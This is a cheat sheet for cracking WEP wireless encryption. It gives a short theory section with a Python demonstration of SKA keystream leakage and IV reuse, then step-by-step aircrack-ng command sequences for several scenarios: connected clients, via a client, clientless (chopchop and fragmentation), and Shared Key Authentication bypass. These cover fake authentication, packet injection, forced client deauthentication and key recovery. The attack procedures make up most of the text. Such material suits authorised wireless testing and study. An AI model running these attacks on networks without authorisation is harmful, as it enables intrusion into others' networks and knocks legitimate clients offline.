WEP

WEP Theory

WEP (Wired Equivalent Privacy) was designed around 1999 to offer security to wireless network users. This standard requires the access point and the authenticating users to know a common secret key of 5 characters (40 bits) or 13 characters (104 bits), although other variations exist (see below). WEP is known to be very weak (IVs can be reused, IVs are too short (24 bits), secret keys are too weak, ...). Note: when attacking 104-bit keys (13 chars), the only consequence is that the number of IVs needed for the cracking process is higher.

Encryption strength (secret key + 24-bit IV):

- 64-bit (40 + 24-bit IV)
- 128-bit (104 + 24-bit IV)
- 152-bit (128 + 24-bit IV)
- 256-bit (232 + 24-bit IV)
- 512-bit (488 + 24-bit IV)

WEP can be configured with two different authentication modes: Open and SKA (Shared Key Authentication). Despite what the name implies, SKA is not necessarily more "secure" than Open. In practice, the shared key does remove the attacker's easy path to an associated state (the state in which the AP accepts data sent from a client). However, the way the shared key is used makes the WEP key easier to retrieve: the SKA handshake sends a plaintext challenge and its encrypted form over the air, and XORing the two yields the keystream for that IV. This requires capturing a legitimate client's authentication to the AP, which is why the deauthentication attack is used.
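The following is an added illustration of the two weaknesses just described (the SKA challenge leaking the keystream, and IV reuse); it is not part of this cheat sheet or of the aircrack-ng suite, and the WEP key, IV and challenge bytes in it are constructed sample values. It omits the 4-byte ICV, so a "frame" here is simply RC4(IV || key) XOR plaintext.

```python
# Added example: why Shared Key Authentication leaks the RC4 keystream and
# why a reused 24-bit IV exposes later frames. Not aircrack-ng code; key,
# IV and challenge below are constructed sample values. ICV is omitted.

def rc4_keystream(key: bytes, length: int) -> bytes:
    """Generate `length` bytes of RC4 keystream for `key` (KSA + PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                   # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP per-frame encryption: RC4 keyed with the 24-bit IV || secret key."""
    return xor(plaintext, rc4_keystream(iv + secret, len(plaintext)))

def keystream_from_ska(challenge: bytes, response: bytes) -> bytes:
    """SKA sends the challenge in clear and its WEP encryption back; XORing
    the two yields the keystream for that IV without knowing the secret."""
    return xor(challenge, response)

def demo() -> dict:
    secret = b"\x01\x02\x03\x04\x05"          # constructed 40-bit WEP key
    iv = b"\xaa\xbb\xcc"                      # constructed 24-bit IV
    challenge = bytes(range(128))             # stand-in for the 128-byte challenge
    response = wep_encrypt(secret, iv, challenge)
    ks = keystream_from_ska(challenge, response)
    # 1) the leaked keystream equals the real RC4 output for this IV
    leak_ok = ks == rc4_keystream(iv + secret, 128)
    # 2) IV reuse: a later frame sent under the same IV is readable with ks
    later = b"ARP who-has 192.0.2.1 tell 192.0.2.2".ljust(64, b"\x00")
    recovered = xor(wep_encrypt(secret, iv, later), ks[:len(later)])
    return {"leak_ok": leak_ok, "iv_reuse_readable": recovered == later}

if __name__ == "__main__":
    print(demo())
```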

WEP Practical

WEP - AP with connected clients

Place your wireless card into monitor mode on the channel number of the AP:

airmon-ng start <interface> <AP channel>

Start an Airodump-ng capture filtering on the AP channel and BSSID, saving the file to disk:

airodump-ng -c <AP Channel> --bssid <AP MAC> -w <capture> <interface>

Conduct a fake authentication attack against the AP:

aireplay-ng -1 0 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>

Launch the ARP request replay attack:

aireplay-ng -3 -b <AP MAC> -h <Your MAC> <interface>

Deauthenticate the connected client to force new IV generation by the AP:

aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> <interface>

Once a significant number of IVs have been captured, run Aircrack-ng against the Airodump capture:

# DON'T use a dictionary for WEP files!!!!
aircrack-ng wep.cap

WEP - Via a Client

Place your wireless card into monitor mode on the AP channel:

airmon-ng start <interface> <AP channel>

Start a capture dump, filtering on the AP channel and BSSID, saving the capture to a file:

airodump-ng -c <AP channel> --bssid <AP MAC> -w <capture> <interface>

Next, conduct a fake authentication against the access point:

aireplay-ng -1 0 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>

Launch the interactive packet replay attack looking for ARP packets coming from the AP:

aireplay-ng -2 -b <AP MAC> -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 <interface>

Once enough IVs have been captured, crack the WEP key:

aircrack-ng -z <capture>

WEP - Clientless

Place your wireless card into monitor mode on the channel number of the AP:

airmon-ng start <interface> <AP channel>

Conduct a fake authentication attack against the AP:

aireplay-ng -1 0 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>

Run attack 4, the KoreK chopchop attack (or attack 5, the fragmentation attack):

KoreK Chop Chop Attack

aireplay-ng -4 -b <AP MAC> -h <Your MAC> <interface>

Fragmentation Attack

aireplay-ng -5 -b <AP MAC> -h <Your MAC> <interface>

Craft an ARP request packet using packetforge-ng:

packetforge-ng -0 -a <AP MAC> -h <Your MAC> -l <Source IP> -k <Dest IP> -y <xor filename> -w <output filename>

Inject the packet into the network using attack 2, the interactive packet replay attack:

aireplay-ng -2 -r <packet filename> <interface>

Crack the WEP key using Aircrack-ng:

aircrack-ng <capture>

WEP - Bypassing Shared Key Authentication

Place your wireless card into monitor mode on the channel number of the AP:

airmon-ng start <interface> <AP channel>

Start an Airodump-ng capture, filtering on the AP channel and BSSID, saving the capture:

airodump-ng -c <AP channel> --bssid <AP MAC> -w <capture> <interface>

Deauthenticate the connected client so that it re-authenticates; Airodump-ng captures the shared key exchange and writes the PRGA XOR keystream to a .xor file:

aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> <interface>

Conduct a fake shared key authentication using the XOR keystream:

aireplay-ng -1 0 -e <ESSID> -y <keystreamfile> -a <AP MAC> -h <Your MAC> <interface>

Launch the ARP request replay attack:

aireplay-ng -3 -b <AP MAC> -h <Your MAC> <interface>

Deauthenticate the victim client again to force the generation of an ARP packet:

aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> <interface>

Once IVs are being generated by the AP, run Aircrack-ng against the capture:

aircrack-ng <capture>

Troubleshooting

During a Shared Key Authentication bypass attack, if after deauthenticating a client you get a "Broken SKA" message instead of "140 bytes keystream:" in your Airodump-ng output, restart the Airodump-ng capture and deauthenticate another client.